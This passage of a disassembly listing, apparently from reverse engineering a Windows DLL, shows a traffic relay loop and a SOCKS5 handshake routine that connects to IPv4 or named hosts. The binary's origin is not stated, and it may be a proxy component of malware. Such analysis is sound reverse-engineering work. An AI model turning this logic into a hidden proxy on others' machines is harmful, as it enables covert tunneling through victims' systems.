loc_10015AC9: ; CODE XREF: sub_10014B0F+F8D�j
; sub_10014B0F+F96�j
xor ecx, ecx
test ecx, ecx
jnz loc_10015A4E
lea edx, [ebp+timeout]
push edx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 0C350h ; len
lea ecx, [ebp+var_C378]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015B3D
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
mov ecx, dword_10073F78
sub ecx, 1
mov dword_10073F78, ecx
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10015B3D: ; CODE XREF: sub_10014B0F+1006�j
cmp [ebp+len], 0
jnz short loc_10015B4B
jmp loc_10014C1F
; ---------------------------------------------------------------------------
loc_10015B4B: ; CODE XREF: sub_10014B0F+1035�j
push 0 ; flags
mov edx, [ebp+len]
push edx ; len
lea eax, [ebp+var_C378]
push eax ; buf
mov ecx, [ebp+var_C3BC]
push ecx ; s
call ds:send ; send
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015B98
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, dword_10073F78
sub eax, 1
mov dword_10073F78, eax
mov eax, 2
jmp short loc_10015BDE
; ---------------------------------------------------------------------------
loc_10015B98: ; CODE XREF: sub_10014B0F+1066�j
jmp loc_10015A41
; ---------------------------------------------------------------------------
loc_10015B9D: ; CODE XREF: sub_10014B0F+F39�j
jmp short loc_10015BC6
; ---------------------------------------------------------------------------
loc_10015B9F: ; DATA XREF: .rdata:stru_100202C0�o
mov ecx, dword_10073F78
sub ecx, 1
mov dword_10073F78, ecx
mov [ebp+var_C52C], 0
mov eax, offset loc_10015BBE
retn
; ---------------------------------------------------------------------------
loc_10015BBE: ; DATA XREF: sub_10014B0F+10A9�o
mov eax, [ebp+var_C52C]
jmp short loc_10015BDE
; ---------------------------------------------------------------------------
loc_10015BC6: ; CODE XREF: sub_10014B0F:loc_10015B9D�j
mov [ebp+var_4], 0FFFFFFFFh
mov edx, dword_10073F78
sub edx, 1
mov dword_10073F78, edx
xor eax, eax
loc_10015BDE: ; CODE XREF: sub_10014B0F+50�j
; sub_10014B0F+213�j ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_10014B0F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_10015BF1(LPVOID)
sub_10015BF1 proc near ; DATA XREF: sub_10016AB3+A2�o
var_C520 = dword ptr -0C520h
var_C51C = dword ptr -0C51Ch
var_C518 = dword ptr -0C518h
var_C514 = byte ptr -0C514h
var_C510 = byte ptr -0C510h
var_C50C = dword ptr -0C50Ch
var_C508 = dword ptr -0C508h
var_C504 = dword ptr -0C504h
var_C500 = dword ptr -0C500h
var_C4FC = word ptr -0C4FCh
var_C4FA = word ptr -0C4FAh
var_C4F8 = dword ptr -0C4F8h
var_C4EC = dword ptr -0C4ECh
var_C4E8 = word ptr -0C4E8h
var_C4E6 = word ptr -0C4E6h
Dst = dword ptr -0C4E4h
var_C4D8 = dword ptr -0C4D8h
var_C4D4 = dword ptr -0C4D4h
var_C4D0 = dword ptr -0C4D0h
var_C4CC = byte ptr -0C4CCh
var_C4C8 = dword ptr -0C4C8h
var_C4C4 = dword ptr -0C4C4h
var_C4C0 = dword ptr -0C4C0h
var_C4BC = dword ptr -0C4BCh
var_C4B8 = dword ptr -0C4B8h
var_C4B4 = dword ptr -0C4B4h
var_C4B0 = dword ptr -0C4B0h
var_C4AC = dword ptr -0C4ACh
readfds = fd_set ptr -0C4A8h
len = dword ptr -0C3A4h
var_C3A0 = dword ptr -0C3A0h
timeout = timeval ptr -0C39Ch
var_C394 = dword ptr -0C394h
var_C390 = dword ptr -0C390h
var_C38C = byte ptr -0C38Ch
name = dword ptr -0C388h
var_C384 = byte ptr -0C384h
var_C380 = byte ptr -0C380h
var_C37C = byte ptr -0C37Ch
var_C378 = word ptr -0C378h
ThreadId = dword ptr -0C374h
s = dword ptr -0C370h
buf = byte ptr -0C36Ch
var_C368 = byte ptr -0C368h
lpParameter = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10015BF1
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 0C510h
call __alloca_probe
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov [ebp+s], eax
mov [ebp+readfds.fd_count], 0
mov [ebp+timeout.tv_sec], 0
mov [ebp+timeout.tv_usec], 989680h
loc_10015C48: ; CODE XREF: sub_10015BF1+D6�j
mov [ebp+var_C4B0], 0
jmp short loc_10015C63
; ---------------------------------------------------------------------------
loc_10015C54: ; CODE XREF: sub_10015BF1:loc_10015C88�j
mov ecx, [ebp+var_C4B0]
add ecx, 1
mov [ebp+var_C4B0], ecx
loc_10015C63: ; CODE XREF: sub_10015BF1+61�j
mov edx, [ebp+var_C4B0]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_10015C8A
mov eax, [ebp+var_C4B0]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_10015C88
jmp short loc_10015C8A
; ---------------------------------------------------------------------------
loc_10015C88: ; CODE XREF: sub_10015BF1+93�j
jmp short loc_10015C54
; ---------------------------------------------------------------------------
loc_10015C8A: ; CODE XREF: sub_10015BF1+7E�j
; sub_10015BF1+95�j
mov edx, [ebp+var_C4B0]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_10015CC3
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10015CC3
mov eax, [ebp+var_C4B0]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_10015CC3: ; CODE XREF: sub_10015BF1+A5�j
; sub_10015BF1+AE�j
xor eax, eax
test eax, eax
jnz loc_10015C48
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015D25
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10015D25: ; CODE XREF: sub_10015BF1+11B�j
mov [ebp+var_C384], 0
loc_10015D2C: ; CODE XREF: sub_10015BF1+1BA�j
mov [ebp+var_C4B4], 0
jmp short loc_10015D47
; ---------------------------------------------------------------------------
loc_10015D38: ; CODE XREF: sub_10015BF1:loc_10015D6C�j
mov eax, [ebp+var_C4B4]
add eax, 1
mov [ebp+var_C4B4], eax
loc_10015D47: ; CODE XREF: sub_10015BF1+145�j
mov ecx, [ebp+var_C4B4]
cmp ecx, [ebp+readfds.fd_count]
jnb short loc_10015D6E
mov edx, [ebp+var_C4B4]
mov eax, [ebp+edx*4+readfds.fd_array]
cmp eax, [ebp+s]
jnz short loc_10015D6C
jmp short loc_10015D6E
; ---------------------------------------------------------------------------
loc_10015D6C: ; CODE XREF: sub_10015BF1+177�j
jmp short loc_10015D38
; ---------------------------------------------------------------------------
loc_10015D6E: ; CODE XREF: sub_10015BF1+162�j
; sub_10015BF1+179�j
mov ecx, [ebp+var_C4B4]
cmp ecx, [ebp+readfds.fd_count]
jnz short loc_10015DA7
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10015DA7
mov edx, [ebp+var_C4B4]
mov eax, [ebp+s]
mov [ebp+edx*4+readfds.fd_array], eax
mov ecx, [ebp+readfds.fd_count]
add ecx, 1
mov [ebp+readfds.fd_count], ecx
loc_10015DA7: ; CODE XREF: sub_10015BF1+189�j
; sub_10015BF1+192�j
xor edx, edx
test edx, edx
jnz loc_10015D2C
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea edx, [ebp+var_C384]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015E09
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10015E09: ; CODE XREF: sub_10015BF1+1FF�j
movsx edx, [ebp+var_C384]
push edx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+var_C390], eax
mov [ebp+var_C394], 0
jmp short loc_10015E3B
; ---------------------------------------------------------------------------
loc_10015E2C: ; CODE XREF: sub_10015BF1:loc_10015F31�j
mov eax, [ebp+var_C394]
add eax, 1
mov [ebp+var_C394], eax
loc_10015E3B: ; CODE XREF: sub_10015BF1+239�j
movsx ecx, [ebp+var_C384]
cmp [ebp+var_C394], ecx
jge loc_10015F36
loc_10015E4E: ; CODE XREF: sub_10015BF1+2DC�j
mov [ebp+var_C4B8], 0
jmp short loc_10015E69
; ---------------------------------------------------------------------------
loc_10015E5A: ; CODE XREF: sub_10015BF1:loc_10015E8E�j
mov edx, [ebp+var_C4B8]
add edx, 1
mov [ebp+var_C4B8], edx
loc_10015E69: ; CODE XREF: sub_10015BF1+267�j
mov eax, [ebp+var_C4B8]
cmp eax, [ebp+readfds.fd_count]
jnb short loc_10015E90
mov ecx, [ebp+var_C4B8]
mov edx, [ebp+ecx*4+readfds.fd_array]
cmp edx, [ebp+s]
jnz short loc_10015E8E
jmp short loc_10015E90
; ---------------------------------------------------------------------------
loc_10015E8E: ; CODE XREF: sub_10015BF1+299�j
jmp short loc_10015E5A
; ---------------------------------------------------------------------------
loc_10015E90: ; CODE XREF: sub_10015BF1+284�j
; sub_10015BF1+29B�j
mov eax, [ebp+var_C4B8]
cmp eax, [ebp+readfds.fd_count]
jnz short loc_10015EC9
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10015EC9
mov ecx, [ebp+var_C4B8]
mov edx, [ebp+s]
mov [ebp+ecx*4+readfds.fd_array], edx
mov eax, [ebp+readfds.fd_count]
add eax, 1
mov [ebp+readfds.fd_count], eax
loc_10015EC9: ; CODE XREF: sub_10015BF1+2AB�j
; sub_10015BF1+2B4�j
xor ecx, ecx
test ecx, ecx
jnz loc_10015E4E
lea edx, [ebp+timeout]
push edx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
mov ecx, [ebp+var_C390]
add ecx, [ebp+var_C394]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015F31
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10015F31: ; CODE XREF: sub_10015BF1+327�j
jmp loc_10015E2C
; ---------------------------------------------------------------------------
loc_10015F36: ; CODE XREF: sub_10015BF1+257�j
push 2 ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+var_C4AC], eax
mov ecx, [ebp+var_C4AC]
mov byte ptr [ecx], 5
movsx edx, [ebp+buf]
cmp edx, 5
jz short loc_10015F68
mov eax, [ebp+var_C4AC]
mov byte ptr [eax+1], 0FFh
jmp short loc_10015F72
; ---------------------------------------------------------------------------
loc_10015F68: ; CODE XREF: sub_10015BF1+369�j
mov ecx, [ebp+var_C4AC]
mov byte ptr [ecx+1], 0
loc_10015F72: ; CODE XREF: sub_10015BF1+375�j
push 0 ; flags
push 2 ; len
mov edx, [ebp+var_C4AC]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015FB0
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10015FB0: ; CODE XREF: sub_10015BF1+3A6�j
; sub_10015BF1+43E�j
mov [ebp+var_C4BC], 0
jmp short loc_10015FCB
; ---------------------------------------------------------------------------
loc_10015FBC: ; CODE XREF: sub_10015BF1:loc_10015FF0�j
mov edx, [ebp+var_C4BC]
add edx, 1
mov [ebp+var_C4BC], edx
loc_10015FCB: ; CODE XREF: sub_10015BF1+3C9�j
mov eax, [ebp+var_C4BC]
cmp eax, [ebp+readfds.fd_count]
jnb short loc_10015FF2
mov ecx, [ebp+var_C4BC]
mov edx, [ebp+ecx*4+readfds.fd_array]
cmp edx, [ebp+s]
jnz short loc_10015FF0
jmp short loc_10015FF2
; ---------------------------------------------------------------------------
loc_10015FF0: ; CODE XREF: sub_10015BF1+3FB�j
jmp short loc_10015FBC
; ---------------------------------------------------------------------------
loc_10015FF2: ; CODE XREF: sub_10015BF1+3E6�j
; sub_10015BF1+3FD�j
mov eax, [ebp+var_C4BC]
cmp eax, [ebp+readfds.fd_count]
jnz short loc_1001602B
cmp [ebp+readfds.fd_count], 40h
jnb short loc_1001602B
mov ecx, [ebp+var_C4BC]
mov edx, [ebp+s]
mov [ebp+ecx*4+readfds.fd_array], edx
mov eax, [ebp+readfds.fd_count]
add eax, 1
mov [ebp+readfds.fd_count], eax
loc_1001602B: ; CODE XREF: sub_10015BF1+40D�j
; sub_10015BF1+416�j
xor ecx, ecx
test ecx, ecx
jnz loc_10015FB0
lea edx, [ebp+timeout]
push edx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_1001608D
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_1001608D: ; CODE XREF: sub_10015BF1+483�j
; sub_10015BF1+51B�j
mov [ebp+var_C4C0], 0
jmp short loc_100160A8
; ---------------------------------------------------------------------------
loc_10016099: ; CODE XREF: sub_10015BF1:loc_100160CD�j
mov ecx, [ebp+var_C4C0]
add ecx, 1
mov [ebp+var_C4C0], ecx
loc_100160A8: ; CODE XREF: sub_10015BF1+4A6�j
mov edx, [ebp+var_C4C0]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_100160CF
mov eax, [ebp+var_C4C0]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_100160CD
jmp short loc_100160CF
; ---------------------------------------------------------------------------
loc_100160CD: ; CODE XREF: sub_10015BF1+4D8�j
jmp short loc_10016099
; ---------------------------------------------------------------------------
loc_100160CF: ; CODE XREF: sub_10015BF1+4C3�j
; sub_10015BF1+4DA�j
mov edx, [ebp+var_C4C0]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_10016108
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10016108
mov eax, [ebp+var_C4C0]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_10016108: ; CODE XREF: sub_10015BF1+4EA�j
; sub_10015BF1+4F3�j
xor eax, eax
test eax, eax
jnz loc_1001608D
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea eax, [ebp+var_C380]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_1001616A
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_1001616A: ; CODE XREF: sub_10015BF1+560�j
; sub_10015BF1+5F8�j
mov [ebp+var_C4C4], 0
jmp short loc_10016185
; ---------------------------------------------------------------------------
loc_10016176: ; CODE XREF: sub_10015BF1:loc_100161AA�j
mov eax, [ebp+var_C4C4]
add eax, 1
mov [ebp+var_C4C4], eax
loc_10016185: ; CODE XREF: sub_10015BF1+583�j
mov ecx, [ebp+var_C4C4]
cmp ecx, [ebp+readfds.fd_count]
jnb short loc_100161AC
mov edx, [ebp+var_C4C4]
mov eax, [ebp+edx*4+readfds.fd_array]
cmp eax, [ebp+s]
jnz short loc_100161AA
jmp short loc_100161AC
; ---------------------------------------------------------------------------
loc_100161AA: ; CODE XREF: sub_10015BF1+5B5�j
jmp short loc_10016176
; ---------------------------------------------------------------------------
loc_100161AC: ; CODE XREF: sub_10015BF1+5A0�j
; sub_10015BF1+5B7�j
mov ecx, [ebp+var_C4C4]
cmp ecx, [ebp+readfds.fd_count]
jnz short loc_100161E5
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100161E5
mov edx, [ebp+var_C4C4]
mov eax, [ebp+s]
mov [ebp+edx*4+readfds.fd_array], eax
mov ecx, [ebp+readfds.fd_count]
add ecx, 1
mov [ebp+readfds.fd_count], ecx
loc_100161E5: ; CODE XREF: sub_10015BF1+5C7�j
; sub_10015BF1+5D0�j
xor edx, edx
test edx, edx
jnz loc_1001616A
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea edx, [ebp+var_C37C]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10016247
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016247: ; CODE XREF: sub_10015BF1+63D�j
; sub_10015BF1+6D5�j
mov [ebp+var_C4C8], 0
jmp short loc_10016262
; ---------------------------------------------------------------------------
loc_10016253: ; CODE XREF: sub_10015BF1:loc_10016287�j
mov edx, [ebp+var_C4C8]
add edx, 1
mov [ebp+var_C4C8], edx
loc_10016262: ; CODE XREF: sub_10015BF1+660�j
mov eax, [ebp+var_C4C8]
cmp eax, [ebp+readfds.fd_count]
jnb short loc_10016289
mov ecx, [ebp+var_C4C8]
mov edx, [ebp+ecx*4+readfds.fd_array]
cmp edx, [ebp+s]
jnz short loc_10016287
jmp short loc_10016289
; ---------------------------------------------------------------------------
loc_10016287: ; CODE XREF: sub_10015BF1+692�j
jmp short loc_10016253
; ---------------------------------------------------------------------------
loc_10016289: ; CODE XREF: sub_10015BF1+67D�j
; sub_10015BF1+694�j
mov eax, [ebp+var_C4C8]
cmp eax, [ebp+readfds.fd_count]
jnz short loc_100162C2
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100162C2
mov ecx, [ebp+var_C4C8]
mov edx, [ebp+s]
mov [ebp+ecx*4+readfds.fd_array], edx
mov eax, [ebp+readfds.fd_count]
add eax, 1
mov [ebp+readfds.fd_count], eax
loc_100162C2: ; CODE XREF: sub_10015BF1+6A4�j
; sub_10015BF1+6AD�j
xor ecx, ecx
test ecx, ecx
jnz loc_10016247
lea edx, [ebp+timeout]
push edx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea ecx, [ebp+var_C38C]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10016324
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016324: ; CODE XREF: sub_10015BF1+71A�j
mov cl, [ebp+var_C38C]
mov [ebp+var_C510], cl
cmp [ebp+var_C510], 1
jz short loc_10016347
cmp [ebp+var_C510], 3
jz short loc_1001639B
jmp loc_10016586
; ---------------------------------------------------------------------------
loc_10016347: ; CODE XREF: sub_10015BF1+746�j
push 4 ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+name], eax
push 0 ; flags
push 4 ; len
mov edx, [ebp+name]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10016396
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016396: ; CODE XREF: sub_10015BF1+78C�j
jmp loc_10016586
; ---------------------------------------------------------------------------
loc_1001639B: ; CODE XREF: sub_10015BF1+74F�j
; sub_10015BF1+829�j
mov [ebp+var_C4D0], 0
jmp short loc_100163B6
; ---------------------------------------------------------------------------
loc_100163A7: ; CODE XREF: sub_10015BF1:loc_100163DB�j
mov edx, [ebp+var_C4D0]
add edx, 1
mov [ebp+var_C4D0], edx
loc_100163B6: ; CODE XREF: sub_10015BF1+7B4�j
mov eax, [ebp+var_C4D0]
cmp eax, [ebp+readfds.fd_count]
jnb short loc_100163DD
mov ecx, [ebp+var_C4D0]
mov edx, [ebp+ecx*4+readfds.fd_array]
cmp edx, [ebp+s]
jnz short loc_100163DB
jmp short loc_100163DD
; ---------------------------------------------------------------------------
loc_100163DB: ; CODE XREF: sub_10015BF1+7E6�j
jmp short loc_100163A7
; ---------------------------------------------------------------------------
loc_100163DD: ; CODE XREF: sub_10015BF1+7D1�j
; sub_10015BF1+7E8�j
mov eax, [ebp+var_C4D0]
cmp eax, [ebp+readfds.fd_count]
jnz short loc_10016416
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10016416
mov ecx, [ebp+var_C4D0]
mov edx, [ebp+s]
mov [ebp+ecx*4+readfds.fd_array], edx
mov eax, [ebp+readfds.fd_count]
add eax, 1
mov [ebp+readfds.fd_count], eax
loc_10016416: ; CODE XREF: sub_10015BF1+7F8�j
; sub_10015BF1+801�j
xor ecx, ecx
test ecx, ecx
jnz loc_1001639B
lea edx, [ebp+timeout]
push edx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea ecx, [ebp+var_C4CC]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10016478
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016478: ; CODE XREF: sub_10015BF1+86E�j
movsx ecx, [ebp+var_C4CC]
add ecx, 1
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+name], eax
loc_10016492: ; CODE XREF: sub_10015BF1+920�j
mov [ebp+var_C4D4], 0
jmp short loc_100164AD
; ---------------------------------------------------------------------------
loc_1001649E: ; CODE XREF: sub_10015BF1:loc_100164D2�j
mov edx, [ebp+var_C4D4]
add edx, 1
mov [ebp+var_C4D4], edx
loc_100164AD: ; CODE XREF: sub_10015BF1+8AB�j
mov eax, [ebp+var_C4D4]
cmp eax, [ebp+readfds.fd_count]
jnb short loc_100164D4
mov ecx, [ebp+var_C4D4]
mov edx, [ebp+ecx*4+readfds.fd_array]
cmp edx, [ebp+s]
jnz short loc_100164D2
jmp short loc_100164D4
; ---------------------------------------------------------------------------
loc_100164D2: ; CODE XREF: sub_10015BF1+8DD�j
jmp short loc_1001649E
; ---------------------------------------------------------------------------
loc_100164D4: ; CODE XREF: sub_10015BF1+8C8�j
; sub_10015BF1+8DF�j
mov eax, [ebp+var_C4D4]
cmp eax, [ebp+readfds.fd_count]
jnz short loc_1001650D
cmp [ebp+readfds.fd_count], 40h
jnb short loc_1001650D
mov ecx, [ebp+var_C4D4]
mov edx, [ebp+s]
mov [ebp+ecx*4+readfds.fd_array], edx
mov eax, [ebp+readfds.fd_count]
add eax, 1
mov [ebp+readfds.fd_count], eax
loc_1001650D: ; CODE XREF: sub_10015BF1+8EF�j
; sub_10015BF1+8F8�j
xor ecx, ecx
test ecx, ecx
jnz loc_10016492
lea edx, [ebp+timeout]
push edx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
movsx ecx, [ebp+var_C4CC]
push ecx ; len
mov edx, [ebp+name]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10016575
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016575: ; CODE XREF: sub_10015BF1+96B�j
movsx edx, [ebp+var_C4CC]
mov eax, [ebp+name]
mov byte ptr [eax+edx], 0
loc_10016586: ; CODE XREF: sub_10015BF1+751�j
; sub_10015BF1:loc_10016396�j ...
mov [ebp+var_C4D8], 0
jmp short loc_100165A1
; ---------------------------------------------------------------------------
loc_10016592: ; CODE XREF: sub_10015BF1:loc_100165C6�j
mov ecx, [ebp+var_C4D8]
add ecx, 1
mov [ebp+var_C4D8], ecx
loc_100165A1: ; CODE XREF: sub_10015BF1+99F�j
mov edx, [ebp+var_C4D8]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_100165C8
mov eax, [ebp+var_C4D8]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_100165C6
jmp short loc_100165C8
; ---------------------------------------------------------------------------
loc_100165C6: ; CODE XREF: sub_10015BF1+9D1�j
jmp short loc_10016592
; ---------------------------------------------------------------------------
loc_100165C8: ; CODE XREF: sub_10015BF1+9BC�j
; sub_10015BF1+9D3�j
mov edx, [ebp+var_C4D8]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_10016601
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10016601
mov eax, [ebp+var_C4D8]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_10016601: ; CODE XREF: sub_10015BF1+9E3�j
; sub_10015BF1+9EC�j
xor eax, eax
test eax, eax
jnz loc_10016586
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 2 ; len
lea eax, [ebp+var_C378]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10016663
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016663: ; CODE XREF: sub_10015BF1+A59�j
push 6 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+var_C3A0], eax
mov al, [ebp+var_C380]
mov [ebp+var_C514], al
cmp [ebp+var_C514], 1
jz short loc_1001669C
cmp [ebp+var_C514], 2
jz loc_10016766
jmp loc_100168EA
; ---------------------------------------------------------------------------
loc_1001669C: ; CODE XREF: sub_10015BF1+A97�j
mov [ebp+var_C4E8], 2
mov cx, [ebp+var_C378]
mov [ebp+var_C4E6], cx
movsx edx, [ebp+var_C38C]
cmp edx, 3
jnz short loc_100166FA
mov eax, [ebp+name]
push eax ; name
call ds:gethostbyname ; gethostbyname
mov [ebp+var_C4EC], eax
cmp [ebp+var_C4EC], 0
jz short loc_100166F8
push 4 ; Size
mov ecx, [ebp+var_C4EC]
mov edx, [ecx+0Ch]
mov eax, [edx]
push eax ; Src
lea ecx, [ebp+Dst]
push ecx ; Dst
call memcpy ; memcpy
add esp, 0Ch
loc_100166F8: ; CODE XREF: sub_10015BF1+AE8�j
jmp short loc_10016708
; ---------------------------------------------------------------------------
loc_100166FA: ; CODE XREF: sub_10015BF1+ACC�j
mov edx, [ebp+name]
mov eax, [edx]
mov [ebp+Dst], eax
loc_10016708: ; CODE XREF: sub_10015BF1:loc_100166F8�j
push 10h ; namelen
lea ecx, [ebp+var_C4E8]
push ecx ; name
mov edx, [ebp+var_C3A0]
push edx ; s
call ds:connect ; connect
mov [ebp+len], eax
cmp [ebp+len], 0
jz short loc_1001674B
mov eax, [ebp+len]
push eax ; int
mov ecx, [ebp+s]
push ecx ; s
call sub_10014769
add esp, 8
or eax, 0FFFFFFFFh
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_1001674B: ; CODE XREF: sub_10015BF1+B3A�j
mov edx, [ebp+var_C3A0]
push edx ; s
mov eax, [ebp+s]
push eax ; int
call sub_10014871
add esp, 8
jmp loc_100168EA
